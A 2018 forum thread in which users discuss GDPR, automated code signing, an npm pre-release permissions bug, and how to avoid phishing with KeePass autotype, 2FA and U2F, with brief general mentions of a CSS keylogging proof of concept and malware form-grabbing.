|
Jabor posted:Peep the penalties for non-compliance too. 4% of global turnover (or 20 million euros, if that's a bigger number) if you don't get free and informed consent before doing something.
|
#
?
Feb 22, 2018 13:37
|
|
|
|
| # ? Apr 29, 2024 08:46 |
|
|
BangersInMyKnickers posted:Yeah, any of the CAs can do this with a standard signing cert. I am not entirely sure how this matches with the rest of your reply where you indicate that some elaborate workflow should be set up. For sure, I appreciate and approve of the need to lock down the private keys because devs are dumb. But I want my automated builds to produce me a new signed copy of my app on every commmit, even if that happens every 5 minutes, without any user interaction. As far as I can tell, this is not possible with the mainstream code signing certificates, which require a dongle with a password that needs manual entering or a physical button that needs pressing. Can you link me to any code signing certificate service that can just install a certificate onto a server (I am find with it being in a hardware dongle or TPM) that does not need a human to take action to sign code?
|
|
#
?
Feb 22, 2018 14:13
|
|
|
Truga posted:I'm in love with GDPR, it's already generating tears and it's not even in effect yet. the security side is going to be a hilarious clusterfuck, but it's helped everything else incidentally
|
|
#
?
Feb 22, 2018 14:41
|
|
|
Truga posted:I'm in love with GDPR, it's already generating tears and it's not even in effect yet. It's super good and amazing watching the meltdown over it
|
|
#
?
Feb 22, 2018 18:34
|
|
|
EssOEss posted:Welcome to General Data Protection Regulation, enforced from 25 May 2018. It takes data protection up to eleven across the EU. Pakled posted:For SA  )
|
|
#
?
Feb 22, 2018 20:00
|
|
|
From another thread:calusari posted:keylogging using CSS: Proof of concept uses a Chrome Extension, but I can think of some other more insidious delivery methods.
|
|
#
?
Feb 22, 2018 21:40
|
|
|
The Fool posted:Proof of concept uses a Chrome Extension, but I can think of some other more insidious delivery methods.
|
|
#
?
Feb 22, 2018 23:32
|
|
|
D. Ebdrup posted:Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root?
|
|
#
?
Feb 22, 2018 23:39
|
|
|
D. Ebdrup posted:Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root? The attack requires you to be able to modify the source of the page you are targeting, or the source of pages being viewed by your target. The attack works without javascript being turned on and without a form needing to be submitted. Between Phishing, MITM attacks and compromised servers, there are plenty of ways for an attack like this to get in front of a target. anthonypants posted:It's CSS, and someone else came up with the idea of putting it into custom stylesheets for subreddits. So, no. And yeah, any social media site that allows its users to add custom css.
|
|
#
?
Feb 22, 2018 23:44
|
|
|
The Fool posted:The attack requires you to be able to modify the source of the page you are targeting, or the source of pages being viewed by your target.
|
|
#
?
Feb 23, 2018 00:09
|
|
|
D. Ebdrup posted:Isn't that like claiming you can root a jail on FreeBSD by loading a kernel module on the host, which requires root? The Chrome extension is just because then you don't need the required webserver to show off the exploit.
|
|
#
?
Feb 23, 2018 00:57
|
|
|
Fair. I completely missed the point of the exploit. So, when do we start turning off the internet?
|
|
#
?
Feb 23, 2018 07:57
|
|
|
https://twitter.com/bcrypt/status/966775011598987265
|
|
#
?
Feb 23, 2018 12:55
|
|
|
Oh my god. Some major fuckups I can see: 1) They don't label it as -rc#/pre/alpha/whatever. 2) Running "npm update -g npm" installs a PRE-RELEASE VERSION. 3) Their blog post about 5.7.0 doesn't mention it's a pre-release at all. 4) It was marked as a normal SEMVER minor stable release. Jesus. Edit, more choice quotes from that thread: quote:This isn't a bug, this is all working exactly as written and intended. There's a correctMkdir function that explicitly uses the sudo caller (not the effective or real user ID) to recursively chown any directory it is called to, and then this function is used all over the place, notably in places like the installation etc directory. quote:Not a single pull request was merged in the last 2 months that came from an outside contributor. There are currently over 70 PRs open and none of them have any activity from the npm team. FlapYoJacks fucked around with this message at 13:20 on Feb 23, 2018 |
|
#
?
Feb 23, 2018 13:14
|
|
|
Yeah the dev team quadrupling down on this, insisting this is not a bug and anyone who installed this pre release version (that was announced on their blog, is in no way labeled as pre release, and loving auto installs when you run a normal update command) had it coming is just amazing to behold Who’d have guessed that the leftpad fiasco wouldn’t be the dumbest thing to come out of the Node community in the last couple years.
|
|
#
?
Feb 23, 2018 14:33
|
|
|
I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install, Firefox has the paranoia plugins (adnauseum and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks). The issue I have it this: I'm forced to rely on Google Authenticate for my 2FA since I can count the number of services I use that currently can use U2F on one finger, and poo poo like my bank has apparently never heard of 2-factor to begin with regardless. That leaves me to rely on Keepass to stop me from handing over my credentials to a phony website. The problem is that, out of the box, it's poo poo at this: It only pays attention to make sure the right word is in the the title bar; it doesn't care at all about what the url says. I tried to use a plugin ages ago that prints the domain part in the title bar, but I discovered Keepass doesn't care about that either (and that plugin didn't survive the Quantum update anyway). I'm a bit stymied, since the obvious answer would be "get a Keepass plugin for Firefox", but I can't do that due to the whole Autofill Phish issue, in addition to all the other security concerns those kinds of browser plug-ins have. Is there a Keepass plug-in or setting I'm missing here, or is the answer really just "pay attention to the url bar and don't be an idiot"?
|
|
#
?
Feb 23, 2018 15:08
|
|
|
It's really easy not to get phished. Manually enter the URL all the time, double check the spelling, check the certificate, then input your credentials from Keepass or whatever. It's really not that hard.
|
|
#
?
Feb 23, 2018 15:14
|
|
|
I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself?
|
|
#
?
Feb 23, 2018 15:18
|
|
|
andrew smash posted:I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself? Yeah, that's what I'm doing, too. I think I'm doing everything right, but that just means I'm more likely to miss a pretty big gap in my login ritual if one exists.
|
|
#
?
Feb 23, 2018 15:22
|
|
|
andrew smash posted:I keep urls stored in the url field in the relevant keepass database entry and tell keepass to “open in browser”. Am I owning myself?
|
|
#
?
Feb 23, 2018 15:34
|
|
|
Or just keep the URLs in a text file to copy/paste, until someone hacks your URLS.txt file...
|
|
#
?
Feb 23, 2018 15:56
|
|
|
So we get "analysts" from our security team sending us giant exports of "SUSPICIOUS LOGIN ACTIVITY ON EXECUTIVE ACCOUNTS." Most of the time it's just page after page of BAD PASSWORD. They expect me to somehow grill our C-levels about whether or not it was them. No. I am not doing that. If our crack security team can't somehow suss out where these logins are coming from and do some investigation without dealing with the spotty memory of the end user, wtf are they going to do if I come back and say yep, they say they were sleeping at this time. OK? NOW WHAT? loving clowns.
|
|
#
?
Feb 23, 2018 16:10
|
|
|
EssOEss posted:I am not entirely sure how this matches with the rest of your reply where you indicate that some elaborate workflow should be set up. You can definitely just get a signing cert without any dongles or passwords. But you’re the exact reason these out of band signing practices exist, talk to your ops/security team to set this up. You should store your signing keys in an encrypted audited way using something like vault. During your build pipeline you’d grab the private key from your key store and sign your code. But I’m a bit wary of this method, how often are you releasing builds to the public? Only your GA public releases should be signed, you shouldn’t automatically sign every build that comes from your build pipeline.
|
|
#
?
Feb 23, 2018 17:35
|
|
|
Kerning Chameleon posted:phishing Your focus should be less on prevention and more on mitigation. Phishing attacks exploit humans which are imperfect and certainly not infallible systems. No matter how careful you are falling victim to phishing is really an inevitability given sufficient time. So, what you want to focus on is mitigating the impact of your credentials being compromised. From the sound of it you're already taking the right steps, specifically using different credentials for each website and enabling 2FA wherever possible. Beyond that I guess you could deliberately change the passwords for all your accounts on a schedule however that would be a PITA. Honestly you're already doing more than can be expected so maybe chill out a bit? AlternateAccount posted:So we get "analysts" from our security team sending us giant exports of "SUSPICIOUS LOGIN ACTIVITY ON EXECUTIVE ACCOUNTS." Most of the time it's just page after page of BAD PASSWORD. They expect me to somehow grill our C-levels about whether or not it was them. No. I am not doing that. Sounds like they're just running garbage-tier reports against your environment that identify things like "X account failed auth Y number of times in period Z". You wouldn't perchance be relying on a BPO for security operations stuff? Either way tell them to stop running rubbish Nessus reports and get a proper SIEM appliance that's configured to do correlation and analysis to actually identify real risks.
|
|
#
?
Feb 23, 2018 17:53
|
|
|
Kerning Chameleon posted:I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install, Kerning Chameleon posted:Firefox has the paranoia plugins (adnauseum  you loving what lol Kerning Chameleon posted:and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list you're automatically grabbing a file over http and inserting it into your hosts file? Kerning Chameleon posted:, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks). please explain what a hijacked bookmark is and how it occurs Kerning Chameleon posted:The issue I have it this: I'm forced to rely on Google Authenticate for my 2FA good Kerning Chameleon posted:since I can count the number of services I use that currently can use U2F on one finger, and poo poo like my bank has apparently never heard of 2-factor to begin with regardless. an unfortunate reality with some banks yeah Kerning Chameleon posted:That leaves me to rely on Keepass to stop me from handing over my credentials to a phony website. The problem is that, out of the box, it's poo poo at this: It only pays attention to make sure the right word is in the the title bar; it doesn't care at all about what the url says. so keepass relies on something under the control of an adversary (the page title). your security depends on a phishing page not having the name of the site it's impersonating in the <title> this is incredibly stupid and you should not use software that works this way Kerning Chameleon posted:I tried to use a plugin ages ago that prints the domain part in the title bar, but I discovered Keepass doesn't care about that either (and that plugin didn't survive the Quantum update anyway). the obvious answer is to use 1password Kerning Chameleon posted:but I can't do that due to the whole Autofill Phish issue, this is solved, in so far as it is possible, by disabling autofill in your password manager (and blocking ads) Kerning Chameleon posted:
some password managers have a significantly better track record than others Kerning Chameleon posted:
you shouldn't have to install third party plugins or match the address bar using your own eyes. if your password manager can't do this, you should use a proper one that does
|
|
#
?
Feb 23, 2018 19:34
|
|
|
cheese-cube posted:Your focus should be less on prevention and more on mitigation. Phishing attacks exploit humans which are imperfect and certainly not infallible systems. No matter how careful you are falling victim to phishing is really an inevitability given sufficient time. So, what you want to focus on is mitigating the impact of your credentials being compromised. Yeah, I do an annual refresh of most of my account passwords (in fact, mine is coming up in a few days). Several hours out of my day, but hey, it's a bit of peace of mind any plaintext account breaches in the prior year are nullified. I'm sure we could have a long, pedantic debate about what a "good" length such a cycle should be, but I figure on top of all the rest of what I do a year is decent enough period to refresh on. quote:Honestly you're already doing more than can be expected so maybe chill out a bit? Sorry, it's just my SSN was (probably) breached last year (in March in a separate breach of the big stupid Equifax breach that sent everyone in a tizzy), which rocketed my already high baseline paranoia to near-tinfoil hat levels. I was convincing I was missing something, so I decided to lay it all out to people far more on the ball about it than me to find what the big stupid obvious pitfall I was missing was. The real silver bullet for phishing is, duh, for sites to stop being stupid/lazy and just implement U2F already. My issue is that even if that happens, you still need a way to authenticate on mobile phones (which, remember, is most people's primary computing devices these days), and even Yubikey's $50 stick (which is actually $100 since you obviously want to keep a backup in your safe) only additionally authenticates on Android phone that are whiz-bangy enough to have NFC, and of course iPhone users are just poo poo out of luck. That means until that hardware issue is resolved, you need to suggest to users to use HOTP/TOTP apps anyway to let their phones in... which just opens you back up to phishing again ("Hello, we detected a security issue and need to authenticate your account, please enter your code/press okay in your auth app..."). It's much like how also having SMS in addition to 2FA-app/U2F defeats the purpose of those, just without getting overworked telecom operators involved. Rufus Ping posted:you're automatically grabbing a file over http and inserting it into your hosts file? It's this hosts file, autoupdated using this script. Honestly, I'm not a of the setup myself wither, and I'm considering just ripping out the script and updating the hosts on my Linux install manually too, like I do on Windows. quote:please explain what a hijacked bookmark is and how it occurs A theoretical scenario outline here: quote:Using a bookmark of some sort is an acceptable approach as well, because you're going to a site/page/URL that you know is correct, because you saved it earlier from a known safe visit to that site. Use that, and it's pretty much the same as having typed in by hand. Again, especially with my other precautions, an extremely unlikely scenario, I have much more to fear from an errant keylogger, but still.
|
|
#
?
Feb 23, 2018 19:56
|
|
|
FYI if you have malware on your computer that can modify your browser's data, that means it can already hook into it to read POSTDATA contents pre-encryption and post-decryption, so visiting the actual site isn't even safe anymore, your bookmarks are meaningless here, you'll just get webinject/formgrabbed from the legitimate website with legitimate certificate.
|
|
#
?
Feb 23, 2018 20:00
|
|
|
Or, using the CSS exploit from yesterday, just keylog whatever you type into a form even if you don't submit it.
|
|
#
?
Feb 23, 2018 20:03
|
|
|
I'm at least somewhat certain that those CSS selectors will not fire on standard input type eq password fields, since you can't get a value="" out of them, but they will fire if you're using some framework like react or angular that binds value="" to some other model
|
|
#
?
Feb 23, 2018 20:08
|
|
|
Kerning Chameleon posted:
|
|
#
?
Feb 23, 2018 20:12
|
|
|
Kerning Chameleon posted:I'm a bit lost these days as to how I'm supposed to idiot-proof my setup so I don't get phished. I do most of what I'm supposed to: sensitive stuff like financials and secondary emails is only logged into on my Linux install, Firefox has the paranoia plugins (adnauseum and uMatrix), the hosts file is configured to autoupdate from the winhelp2002 list, and I use Keepass to browse to and auto-type login to the accounts (don't even type them in myself or use bookmarks, for fear of malignant typos or hijacked bookmarks). All of this is weird and stupid. Just don't put your password into the wrong site.
|
|
#
?
Feb 23, 2018 20:14
|
|
|
And I thought I was being paranoid using DNS blacklists (a la Pi Hole but not Pi Hole) on my Edgerouter, which inevitably pissed of my wife because she couldn't click on her email links because they went through list-manage.com or some poo poo. That's my story for today.
|
|
#
?
Feb 23, 2018 20:16
|
|
|
Kerning Chameleon posted:
that's a yes then Kerning Chameleon posted:A theoretical scenario outline here: you're hosed anyway if something gets the privs to do this
|
|
#
?
Feb 23, 2018 20:16
|
|
|
I don't think I have ever seen any malware in the wild do that, fwiw
|
|
#
?
Feb 23, 2018 20:23
|
|
|
I am a bit lost too: why do you need a browser plugin? What's wrong with the desktop application? You can copy and paste usernames and passwords from it into the appropriate login forms, never having to worry about automation making a mistake.
|
|
#
?
Feb 23, 2018 20:33
|
|
|
but what if the password manager gets phished?
|
|
#
?
Feb 23, 2018 20:37
|
|
|
By the way whoever came up with the hosts file that guy is using is definitely smart and good at computers and absolutely not a crank
|
|
#
?
Feb 23, 2018 20:39
|
|
|
Volguus posted:I am a bit lost too: why do you need a browser plugin? What's wrong with the desktop application? You can copy and paste usernames and passwords from it into the appropriate login forms, never having to worry about automation making a mistake. Keyloggers can grab from your clipboard. Autotype helps make the keyloggers job more difficult. Additionally, the password manager is supposed to not shortcut autotype on fake websites: if I use the autotype shortcut on a site while my Keepass archive is open, and the site title doesn't have any words that match the site name in the archive, the autotype won't fire, and I have to manually go into the program and click the autotype button there to do it. This is supposed to make me, the user, use that time to stop and think why the manager isn't performing autotype on this site. The problem is Keepass relies on <title>, not the actual URL for this, despite the fact you can enter the url in a dedicated field in the credential entry in the archive (and you can even browse to the site with it).
|
|
#
?
Feb 23, 2018 20:42
|
|
|
Kerning Chameleon posted:Keyloggers can grab from your clipboard. Autotype helps make the keyloggers job more difficult. Additionally, the password manager is supposed to not shortcut autotype on fake websites: if I use the autotype shortcut on a site while my Keepass archive is open, and the site title doesn't have any words that match the site name in the archive, the autotype won't fire, and I have to manually go into the program and click the autotype button there to do it. This is supposed to make me, the user, use that time to stop and think why the manager isn't performing autotype on this site. Much password stealing malware will just outright take it out of memory or via formgrabbing, directly copy out of browser password saved db, etc. Don't typically care about autotype, how you type it in, if you copy it in - they just see "POST /login Host: example.com username=x&password=y", or otherwise Again, once you have malware running on the same privilege level or better, all bets are off anyway and you have much bigger issues. Using an encrypted at rest password manager won't save you because it can just copy the entire unpacked db when you open it. (that being said, I use keepass without autotype and without URLs saved, and no browser plugin & find it useful) Impotence fucked around with this message at 20:54 on Feb 23, 2018 |
|
#
?
Feb 23, 2018 20:49
|
|
|
|
| # ? Apr 29, 2024 08:46 |
|
|
Biowarfare posted:Much password stealing malware will just outright take it out of memory or via formgrabbing, directly copy out of browser password saved db, etc. Yes, that's why I only sign in my sensitive accounts on my seldom-used-otherwise-Linux-install: the probability of a Linux-based malware getting through the various adblockers and getting root is far lower than that I just screw up and somehow open up a Linux-based malware from an email attachment instead. At the point we're talking about, I'd probably be dealing with targeted attacks from nation-state actors, so I shouldn't worry anyway because then my rear end is grass no matter what, but it still made me uneasy to be doing so well on the big stuff and then just be lax about the little things.
|
|
#
?
Feb 23, 2018 20:55
|
|